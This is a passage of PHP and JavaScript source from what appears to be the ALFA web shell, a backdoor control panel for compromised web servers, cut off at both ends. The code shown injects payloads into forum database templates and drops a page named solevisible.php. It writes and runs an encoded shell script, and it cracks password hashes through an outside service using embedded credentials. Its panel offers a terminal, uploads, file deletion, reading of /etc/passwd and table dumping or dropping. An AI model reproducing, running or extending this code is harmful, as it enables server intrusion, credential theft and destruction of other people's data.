$p = "UPDATE ".$_POST['alfa6']."template SET `template`='".$code."' WHERE `title`='".$faq_name."'";
$ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));
$geturl = @mysqli_query($conn,"select `value` from ".$_POST['alfa6']."setting WHERE `varname`='bburl'");
$getval = @mysqli_fetch_assoc($geturl);
$saveval = $getval['value'];
if($faq_name == "header"){
if(substr($saveval, -5, 5) == "/core"){
$saveval = substr($saveval, 0, -5);
}
}
$realurl = parse_url($saveval,PHP_URL_HOST);
$realpath = parse_url($saveval,PHP_URL_PATH);
$res = false;
$AlfaCurl = new AlfaCURL();
if(extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto'){
if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
@fputs($fsock, "GET $realpath.$faq_file HTTP/1.1\r\n");
@fputs($fsock, "HOST: $realurl\r\n");
@fputs($fsock, "Connection: close\r\n\r\n");
$check = fgets($fsock);
if(preg_match("/200 OK/i",$check)){
$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".mysqli_real_escape_string($conn,$savetoass)."' WHERE title ='".$faq_name."'";
$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
$res = true;
}
@fclose($fsock);
}
}elseif(function_exists('curl_version') && $method == 'auto'){
$AlfaCurl->Send($realurl.$realpath.$faq_file);
$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".mysqli_real_escape_string($conn,$savetoass)."' WHERE title ='".$faq_name."'";
$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
$res = true;
}
if($res){
$ff = 'http://'.$realurl.$realpath."/solevisible.php";
output($ff);
}else{
$ff = 'http://'.$realurl.$realpath.$faq_file;
$fff = 'http://'.$realurl.$realpath."/solevisible.php";
echo "<center><p><font color=\"#FFFFFF\">First Open This Link => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color=\"#FFFFFF\">Second Open This Link => </font><a href='".$fff."' target='_blank'>".$fff."</a></center></p>";}}}
echo '</div>';
alfafooter();
}
function alfacheckfiletype(){
$path = $_POST['path'];
$arg = $_POST['arg'];
if(@is_file($path.'/'.$arg)){
echo("file");
}else{
echo("dir");
}
}
function alfaWriteTocgiapi($name, $source){
$temp = "";
$not_api = array("basedir.alfa", "getdir.alfa", "getheader.alfa");
if(in_array($name, $not_api)){
$temp = ALFA_TEMPDIR;
if($temp){
@chdir($temp);
}
}else{
alfaCreateParentFolder();
@chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
}
@mkdir('alfacgiapi',0755);
__write_file("alfacgiapi/".$name, __get_resource($source));
@chmod("alfacgiapi/".$name, 0755);
return $temp;
}
function alfacheckcgi(){if(strlen(alfaEx("id",false,true,true))>0)echo("ok");else echo("no");}
function alfaupdateheader(){
if(!isset($_COOKIE["updateheader_data"])){
$bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";
$realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));
$tmp_path = alfaWriteTocgiapi("getheader.alfa",$bash);
$data = alfaEx("cd '{$tmp_path}/alfacgiapi';sh getheader.alfa",false,true,true);
if(@is_array(@json_decode($data,true))){
__alfa_set_cookie("updateheader_data", __ZW5jb2Rlcg($data));
echo $data;
}
}else{
echo __ZGVjb2Rlcg($_COOKIE["updateheader_data"]);
}
}
function is_ipv4($ip){
return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
}
function __alert($s){
echo '<center>'.__pre().$s.'</center>';
}
function create_table($data){
echo '<table border="1">';
foreach ($data as $key => $val){
$array = array();
foreach($val as $k => $v){
$array[$k] = $v;
}
echo "<tr><td><div class='tbltxt'>".$array['tdName']."</div></td><td><input type='text' id='".$array['id']."' name='".$array['inputName']."' ".($array['placeholder']?'placeholder':'value')."='".$array['inputValue']."' size='".$array['inputSize']."' ".($array['disabled']?'disabled':'')."></td></tr>";
}
echo '</table>';
}
function alfacpcrack(){
alfahead();
echo '<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'dec\')">| DeCrypter | </a><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'analyzer\')">| Hash Analyzer | </a></h3></center>';
if($_POST['alfa1']=='dec'){
$algorithms = array('md5'=>'MD5','md4'=>'MD4','sha1'=>'SHA1','sha256'=>'SHA256','sha384'=>'SHA384','sha512'=>'SHA512','ntlm'=>'NTLM');
echo '<center><div class="txtfont_header">| DeCrypter |</div><br><br>
<form onsubmit="g(\'cpcrack\',null,\'dec\',this.md5.value,\'>>\',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">';
foreach($algorithms as $key=>$val){echo('<option value="'.$key.'">'.$val.'</option>');}
echo'</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
if($_POST['alfa3'] == '>>'){
$hash = $_POST['alfa2'];
if(!empty($hash)){
$hash_type = $_POST['alfa4'];
$email = "solevisible@gmail.com";
$code = "7b9fa79f92c3cd96";
$target = "https://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;
$resp = @file_get_contents($target);
if($resp==''){
$get = new AlfaCURL();
$resp = $get->Send($target);
}
echo __pre().'<center>';
switch($resp){
case('CODE ERREUR : 001'):echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>";break;
case('CODE ERREUR : 003'):echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>";break;
case('CODE ERREUR : 004'):echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>";break;
case('CODE ERREUR : 005'):echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>";break;
}
if(substr($resp,0,4)!='CODE'&&$resp!=''){
echo "<b>Result: <font color='green'>".$resp."</font></b>";
}elseif(substr($resp,0,4)!='CODE'){
echo "<font color='red'>NoT Found</font><br />";
}
echo('</center>');
}
}
}
if($_POST['alfa1']=='analyzer'){
echo '<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>
<form onsubmit="g(\'cpcrack\',null,\'analyzer\',this.hash.value,\'>>\');return false;">
<div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
if($_POST['alfa3'] == '>>'){
$hash = $_POST['alfa2'];
if(!empty($hash)){
$curl = new AlfaCURL();
$resp = $curl->Send("https://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");
echo(__pre().'<center>');
if(preg_match('#<fieldset class="trouve">(.*?)</fieldset>#',$resp,$s)){
echo('<font color="green">'.$s[1].'</font>');
}else{
echo('<font color="red">Not Found...!</font>');
}
echo('</center><br>');
}
}
}
echo '</div>';
alfafooter();
}
function alfafooter(){
if(!isset($_POST['ajax'])){
echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
<tr>
<td width='17%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;\"><span class='footer_text'>Make File : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value='>>'></form></td>
<td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;\"><span class='footer_text'>Make Dir : </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value='>>'></form></td>
<td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;\"><span class='footer_text'>Delete : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value='>>'></form></td>
<td width='19%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;\"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value='>>'></form></td>
</tr>
<tr>
<td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span class='footer_text'>Change Dir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='".htmlspecialchars($GLOBALS['cwd'])."'> <input type='submit' value='>>'></form></td>
<td colspan='2'><form onsubmit=\"editor(this.file.value,'view','','','','file');return false;\"><span><span class='footer_text'>Read File : </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value='>>'></form></td>
</tr>
<tr>
<td colspan='4'><form style='margin-top: 10px;' onsubmit=\"return false;\" autocomplete='off'><span><button onClick='alfaOpenPhpTerminal();return false;' class='foottable alfa_custom_cmd_btn'>Terminal</button><br></form></td>
</tr>
<tr>
<td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'>
<input type='hidden' name='a' value='FilesMAn'>
<input type='hidden' name='c' value='" . $GLOBALS['cwd'] ."'>
<input type='hidden' name='ajax' value='true'>
<input type='hidden' name='alfa1' value='uploadFile'>
<input type='hidden' name='charset' value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
<span class='footer_text'>Upload file: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);' multiple></p><input type='submit' name='submit' value='>>'></form><div id='alfa-copyright'><span class='copyright'>[ ??? &copy; 2012-".date('Y')." ]</span></div></td>
</tr>
</table>
</div>

<div id='options_window' style='background:rgba(0, 0, 0, 0.69);'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"options_window\");'></div><div onClick='editorClose(\"options_window\");' class='close-button'></div></div></div><div style='height:100%;' class='content_options_holder'><div class='options_tab'></div><div class='options_content' style='margin-left:14px;margin-right:30px;background:#000;overflow:auto;'></div></div></div></div>

<div id='database_window' style='background:rgba(0, 0, 0, 0.69);'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'>Sql Manager</div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"database_window\");'></div><div onClick='editorClose(\"database_window\");' class='close-button'></div></div></div><div class='content_options_holder' style='margin-left:14px;margin-right:30px;background:#000;max-height:90%;'><div class='sql-tabs'></div><div class='sql-contents' style='max-height: 85vh;'></div></div></div></div>

<div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"cgiloader\");'></div><div onClick='editorClose(\"cgiloader\");' class='close-button'></div></div></div><div id='cgiframe' style='position:relative;margin-left:14px;margin-right:30px;'><div class='terminal-tabs'></div><div style='height:90%;' class='terminal-contents'></div></div></div></div>
<div id='editor' style='display:none;'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"editor\");'></div><div onClick='editorClose(\"editor\");' class='close-button'></div></div></div><div onclick='historyPanelController(this);' mode='visible' class='history-panel-controller'><<</div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'><div class='editor-tabs'></div><div class='editor-content-holder'></div></div></div></div></div></div>
<div id='update-content'></div>
<div id='database_window-minimized' onclick='showEditor(\"database_window\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div class='minimized-text' style='top: 15px;'>Database</div></div></div>
<div id='options_window-minimized' onclick='showEditor(\"options_window\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 4px;' class='minimized-text'>Options</div></div></div>
<div id='editor-minimized' onclick='showEditor(\"editor\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 2px;' class='minimized-text'>Editor</div></div></div>
<div id='cgiloader-minimized' onclick='showEditor(\"cgiloader\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 12px;' class='minimized-text'>Cgi Shell</div></div></div>
<div id='rightclick_menu'>
  <a target='_blank' href='' name='newtab'><img src=\"http://solevisible.com/icons/menu/newtab.svg\"> Open in new tab</a>
  <a target='_blank' href='' name='link'><img src=\"http://solevisible.com/icons/menu/link.svg\"> Open file directly</a>
  <a href='javascript:void(0);' name='download'><img src=\"http://solevisible.com/icons/menu/download2.svg\"> Download</a>
  <a href='' name='view'><img src=\"http://solevisible.com/icons/menu/view.svg\"> View</a>
  <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='view_archive'><img src=\"http://solevisible.com/icons/menu/view.svg\"> View Archive</a>
  <a href='' name='edit'><img src=\"http://solevisible.com/icons/menu/edit.svg\"> Edit</a>
  <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"move\");' ftype='' path='' fname='' href='' href='' name='move'><img src=\"http://solevisible.com/icons/menu/move.svg\"> Move</a>
  <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"copy\");' ftype='' path='' fname='' href='' name='copy'><img src=\"http://solevisible.com/icons/menu/copy.svg\"> Copy</a>
  <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"rename\");' ftype='' path='' fname='' name='rename'><img src=\"http://solevisible.com/icons/menu/rename.svg\">  Rename</a>
  <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"modify\");' ftype='' path='' fname='' name='modify'><img src=\"http://solevisible.com/icons/menu/time.svg\">  Modify</a>
  <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"permission\");' name='permission'><img src=\"http://solevisible.com/icons/menu/key.svg\"> Change Permissions</a>
  <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='compress'><img src=\"http://solevisible.com/icons/menu/resize.svg\"> Compress</a>
  <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='extract'><img src=\"http://solevisible.com/icons/menu/increase.svg\"> Extract</a>
  <a href='javascript:void(0);' name='delete'><img src=\"http://solevisible.com/icons/menu/delete.svg\"> Delete</a>
</div>
<div id=\"filesman-tab-full-path\"></div>
<div id='alert-area' class='alert-area'></div>
<div class='cl-popup-fixed' style='display:none;'>
<div id='shortcutMenu-holder'>
<div class='popup-head'></div>
<form autocomplete='off' onSubmit='return false;'>
<label class='old-path-lbl'></label>
<div style='overflow: hidden;white-space: nowrap;text-overflow: ellipsis;' class='old-path-content'></div>
<label style='margin-top:10px;' class='new-filename-lbl'>New file name</label>
<input type='text' name='fname'>
<div class='perm-table-holder'>
<table>
   <tbody>
  <tr>
 <td><b>Mode</b></td>
 <td>User</td>
 <td>Group</td>
 <td>World</td>
  </tr>
  <tr>
 <td>Read</td>
 <td><input type='checkbox' name='ur' value='4' onclick='calcperm();'></td>
 <td><input type='checkbox' name='gr' value='4' onclick='calcperm();'></td>
 <td><input type='checkbox' name='wr' value='4' onclick='calcperm();'></td>
  </tr>
  <tr>
 <td>Write</td>
 <td><input type='checkbox' name='uw' value='2' onclick='calcperm();'></td>
 <td><input type='checkbox' name='gw' value='2' onclick='calcperm();'></td>
 <td><input type='checkbox' name='ww' value='2' onclick='calcperm();'></td>
  </tr>
  <tr>
 <td>Execute</td>
 <td><input type='checkbox' name='ux' value='1' onclick='calcperm();'></td>
 <td><input type='checkbox' name='gx' value='1' onclick='calcperm();'></td>
 <td><input type='checkbox' name='wx' value='1' onclick='calcperm();'></td>
  </tr>
  <tr>
 <td>Permission</td>
 <td><input style='width:60px;' type='text' name='u' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"u\", [\"u\"]);'></td>
 <td><input style='width:60px;' type='text' name='g' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"g\", [\"g\"]);'></td>
 <td><input style='width:60px;' type='text' name='w' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"w\", [\"w\"]);'></td>
  </tr>
   </tbody>
</table>
</div>

</form>
<div class='popup-foot'>
<button style='background: #2b5225;' name='accept' action='' onclick='alfaPopUpDoAction(this);'></button>
<button style='background: #9e2c2c;' onclick='d.querySelector(\".cl-popup-fixed\").style.display=\"none\";'>Cancell</button>
</div>
</div>
</div>";?>
<script>
function alfaMysqlApi(e,t){var a={host:mysql_cache[e.db_id].host,user:mysql_cache[e.db_id].user,pass:mysql_cache[e.db_id].pass,db:e.db_target,db_id:e.db_id};if(e.hasOwnProperty("db_info"))for(var i in e.db_info)a[i]=e.db_info[i];var l={a:alfab64("Sql_manager_api"),c_:alfab64(c_),alfa1:alfab64(JSON.stringify(a))};if(e.hasOwnProperty("post"))for(var i in e.post.hasOwnProperty("alfa2")&&"load_data"!=e.post.alfa2&&"page"!=e.post.alfa2&&"edit"!=e.post.alfa2&&"delete"!=e.post.alfa2&&(d.querySelector("#"+e.db_id+" .mysql-query-result-header .mysql-query-pager").innerHTML="",d.querySelector("#"+e.db_id+" .mysql-query-result-header .mysql-query-reporter").innerHTML=""),e.post)l[i]=alfab64(e.post[i]);var r="";for(var o in l)r+=o+"="+l[o]+"&";alfaloader(e.db_id,"block"),_Ajax(d.URL,r,function(a){alfaloader(e.db_id,"none"),t(a)},!0,e.db_id)}function alfaMysqlFilterTable(e,t){setTimeout(function(){var a="",i="",l=(a="","");if(null!=e)a=e.getAttribute("target"),i=e.getAttribute("db_id"),l=e.value;else a=t.target,i=t.db_id,l=t.value;l=new RegExp(l,"i"),d.querySelectorAll("#"+i+" "+a+" ul > li").forEach(function(e){var t=e.querySelector(".mysql_tables");if(null==t)return!1;-1==(t=t.innerText).search(l)?e.style.display="none":e.style.display="block"})},200)}function alfaMysqlFilterAllTable(e,t){var a=e.getAttribute("db_id"),i=d.querySelector("#"+a+" .mysql-tables input[name=filter_all]").value,l=d.querySelector("#"+a+" input[name=sql_count]").checked,r=[],o=[];if(d.querySelectorAll("#"+a+" .mysql-tables .list_container").forEach(function(e){var t=e.getAttribute("mode"),a=e.getAttribute("db_name");"no"==t&&r.push(a),o.push(a)}),r.length>0){if(0==i.length&&void 0===t)return!1;alfaMysqlApi({db_id:a,db_target:r[0],ajax_id:"mysql_get_all_tables",db_info:{databases:r},post:{alfa2:"load_all_tables",alfa3:l}},function(r){if(0!=r.length){for(var o in r=JSON.parse(r)){var n=o,s=d.querySelector("#"+a+" .cls-"+n);alfaMysqlMakeTblList(r[o],s,a,n,l)}void 0===t?alfaMysqlFilterTable(null,{db_id:a,target:".mysql-tables .list_container",value:i}):(e.setAttribute("mode","opened"),d.querySelector("#"+a+" .mysql-tables .parent-expander img").src="http://solevisible.com/icons/menu/b_minus.png")}})}else if(void 0===t)for(var n in alfaMysqlFilterTable(null,{db_id:a,target:".mysql-tables .list_container",value:i}),o)alfaMysqlTableMode(a,o[n],"closed");else{var s="",c=e.getAttribute("mode");for(var n in"opened"==c?(e.setAttribute("mode","closed"),s="b_plus.png"):(e.setAttribute("mode","opened"),s="b_minus.png"),o)alfaMysqlTableMode(a,o[n],c);d.querySelector("#"+a+" .mysql-tables .parent-expander img").src="http://solevisible.com/icons/menu/"+s}}function alfaMysqlTableMode(e,t,a){var i=d.querySelector("#"+e+" .cls-"+t),l="";void 0===a?(l=-1!=i.classList.value.indexOf("hide-db-tables")?"b_minus.png":"b_plus.png",i.classList.toggle("hide-db-tables")):"opened"==a?(l="b_plus.png",i.classList.add("hide-db-tables")):(l="b_minus.png",i.classList.remove("hide-db-tables")),d.querySelector("#"+e+" .cls-"+t+"-expander img").src="http://solevisible.com/icons/menu/"+l}function alfaMysqlExpander(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=e.getAttribute("sql_count"),l=d.querySelector("#"+a+" .cls-"+t);"loaded"==l.getAttribute("mode")?alfaMysqlTableMode(a,t):alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_get_tables",post:{alfa2:"load_tables",alfa3:i}},function(e){0!=e.length&&alfaMysqlMakeTblList(e=JSON.parse(e),l,a,t,i)})}function alfaMysqlTablesEvil(e){var t=e.getAttribute("target"),a=e.getAttribute("db_id"),i=e.getAttribute("mode");"checked"==i?(i=!1,e.setAttribute("mode","not")):(i=!0,e.setAttribute("mode","checked")),d.querySelectorAll("#"+a+" "+t+" input[name=tbl\\[\\]]").forEach(function(e){e.checked=i})}function alfaMysqlTablesDumpDrop(e){var t=e.getAttribute("target"),a=e.getAttribute("db_id"),i="none";"dump"==e.value&&(i="block"),d.querySelector("#"+a+" "+t+" .dump-file-holder").style.display=i}function alfaMysqlTablesDumpDropBtn(e){var t=e.getAttribute("target"),a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=[],r=d.querySelector("#"+i+" input[name=sql_count]").checked,o=d.querySelector("#"+i+" "+t),n=o.querySelector("select[name=tables_evil]").value,s=o.querySelector(".dump-file-holder input").value;d.querySelectorAll("#"+i+" "+t+" input[name=tbl\\[\\]]").forEach(function(e){e.checked&&l.push(e.value)}),l.length>0&&alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_query_evil",db_info:{tables:l,mode:n,dump_file:s},post:{alfa2:"dump_drop"}},function(e){0!=e.length&&(e=JSON.parse(e),"drop"==n?alfaMysqlMakeTblList(e,o,i,a,r):o.querySelector(".dump-file-holder").insertAdjacentHTML("beforeend","<div><a href='javascript:void(0);' onclick='g(\"FilesTools\",null,\""+s+'","download");\'><span>Download: '+s+"</span></a></div>"))})}function alfaMysqlMakeTblList(e,t,a,i,l){t.setAttribute("mode","loaded");var r='<ul><li><div class="block"><i></i><b></b></div><div><input style="padding: 0;margin-left: 11px;text-align:center;" type="text" class="db-opt-id" db_id="'+a+'" placeholder="Filter Table" target=".cls-'+i+'" onkeyup="alfaMysqlFilterTable(this);" name="filter"></div></li>';for(varo in e)null!=e[o]&&(r+="<li><div class='block'><i></i><b></b></div><div class='tables-row'><input type='checkbox' name='tbl[]' value='"+e[o].name+"'>&nbsp;<a class='db-opt-id' db_target='"+i+"' db_id='"+a+"' href='javascript:void(0);' onclick=\"alfaLoadTableData(this, '"+e[o].name+"')\"><span class='mysql_tables' style='font-weight:unset;'>"+e[o].name+"</span></a>"+(l?" <small><span style='font-weight:unset;' class='mysql_table_count'>("+e[o].count+")</span></small>":"&nbsp;")+"</div></li>");r+='</ul><div style="margin-left: 26px;margin-bottom: 10px;margin-top: 10px;"><input onchange="alfaMysqlTablesEvil(this);" db_id="'+a+'" class="db-opt-id" target=".cls-'+i+'" type="checkbox" class="db-opt-id"><select onchange="alfaMysqlTablesDumpDrop(this);" class="db-opt-id" db_id="'+a+'" target=".cls-'+i+'" class="db-opt-id" name="tables_evil" style="padding: 0;width: 100px;"><option selected>drop</option><option>dump</option></select> <button onclick="alfaMysqlTablesDumpDropBtn(this);return false;" db_id="'+a+'" class="db-opt-id" db_target="'+i+'" target=".cls-'+i+'" class="db-opt-id">Do it</button><div class="dump-file-holder" style="display:none;margin-left:20px;margin-top: 5px;"><input style="padding: 0;text-align:center;" type="text" placeholder="dump.sql" name="dump_file"></div></div>',t.innerHTML=r,d.querySelector("#"+a+" .cls-"+i+"-expander img").src="http://solevisible.com/icons/menu/b_minus.png"}function alfaMysqlQuery(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a+" textarea[name=query]").value;alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_load_query_data",db_info:{query:i},post:{alfa2:"query"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.status?e.table:"",alfaMysqlTabCtl({child:1,db_id:a,target:".mysql-query-result-content"},!0))})}function alfaMysqlReportBuilder(e,t){var a="";t.status||(a="<div><span>Error: </span><div style='padding-left: 50px;'><pre>"+t.error+"</pre></div></div>");var i="<div><span>Query:</span><div style='padding-left: 50px;'><pre>"+t.query+"</pre></div>"+a+"</div>";d.querySelector("#"+e+" .mysql-query-reporter").innerHTML=i}function alfaMysqlTablePanelCtl(e){var t=e.getAttribute("db_id"),a=(t=e.getAttribute("db_id"),d.querySelector("#"+t)),i=a.querySelector(".tables-panel-ctl");"none"==i.getAttribute("mode")?(a.querySelector(".mysql-tables").style.display="block",i.setAttribute("mode","block"),i.innerHTML="&#x3C;&#x3C;",a.querySelector(".mysql-query-results-fixed").classList.remove("mysql-query-results-fixed")):(a.querySelector(".mysql-tables").style.display="none",i.setAttribute("mode","none"),i.innerHTML="&#x3E;&#x3E;",a.querySelector(".mysql-query-results").classList.add("mysql-query-results-fixed")),i.classList.toggle("tables-panel-ctl-min")}function alfaMysqlTabCtl(e,t){var a=void 0===t?e.getAttribute("db_id"):e.db_id,i=void 0===t?e.getAttribute("target"):e.target;d.querySelectorAll("#"+a+" .mysql-query-content").forEach(function(e){e.classList.add("mysql-hide-content")}),d.querySelector("#"+a+" .mysql-query-result-tabs .mysql-query-selected-tab").classList.remove("mysql-query-selected-tab"),void 0===t?e.classList.add("mysql-query-selected-tab"):d.querySelector("#"+a+" .mysql-query-result-tabs div:nth-child("+e.child+")").classList.add("mysql-query-selected-tab"),d.querySelector("#"+a+" "+i).classList.remove("mysql-hide-content")}function alfaLoadTableData(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id");alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_load_table_data",db_info:{table:t},post:{alfa2:"load_data"}},function(e){if(0!=e.length){e=JSON.parse(e);var l="",r="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th></tr>",o="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th><th>Change</th></tr>",n="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Collation</th><th>Operator</th><th>Value</th></tr>",s=["int","smallint","bigint","tinyint","mediumint"],c=["longtext","text","mediumtext","tinytext"];for(var u in e.columns){var p="text";-1!=s.indexOf(e.columns[u].data_type)&&(p="number"),n+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td>"+e.columns[u].type+"</td><td>"+e.columns[u].collation+"</td><td><select name='"+e.columns[u].name+"'><option value='='>=</option><option value='!='>!=</option><option value='>'>&gt;</option><option value='>='>&gt;=</option><option value='<'>&lt;</option><option value='<='>&lt;=</option><option value=\"= ''\">= ''</option><option value=\"!= ''\">!= ''</option><option value='LIKE'>LIKE</option><option value='LIKE %...%'>LIKE %...%</option><option value='NOT LIKE'>NOT LIKE</option><option value='REGEXP'>REGEXP</option><option value='REGEXP ^...$'>REGEXP ^...$</option><option value='NOT REGEXP'>NOT REGEXP</option><option value='IN (...)'>IN (...)</option><option value='NOT IN (...)'>NOT IN (...)</option><option value='BETWEEN'>BETWEEN</option><option value='NOT BETWEEN'>NOT BETWEEN</option><option value='IS NULL'>IS NULL</option><option value='IS NOT NULL'>IS NOT NULL</option></select></td><td><input type='"+p+"' name='"+e.columns[u].name+"'></td></tr>";var f=alfaMysqlLoadDataType(e.columns[u].data_type);null==e.columns[u].type_value&&(e.columns[u].type_value=""),o+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td><select name='sel_"+e.columns[u].name+"'>"+f+"</select></td><td><input name='value_"+e.columns[u].name+"' type='text' value='"+(-1==c.indexOf(e.columns[u].data_type)?e.columns[u].type_value:"")+"'></td><td><button col_name='"+e.columns[u].name+"' tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlAlterTbl(this);return false;'>Change</button></td></tr>";var m="";switch(e.columns[u].data_type){case"longtext":case"text":m="<textarea name='"+e.columns[u].name+"' rows='5'></textarea>";break;case"int":case"smallint":case"bigint":m="<input type='number' name='"+e.columns[u].name+"' value=''>";break;default:m="<input type='text' name='"+e.columns[u].name+"' value=''>"}r+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td>"+e.columns[u].type+"</td><td>"+m+"</td></tr>"}if(r+="</table><div style='margin-left:20px;'><button tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlUpdateRow(this, \"insert\");return false;'>Insert</button></div><div class='mysql-insert-result'></div>",o+="</table><div 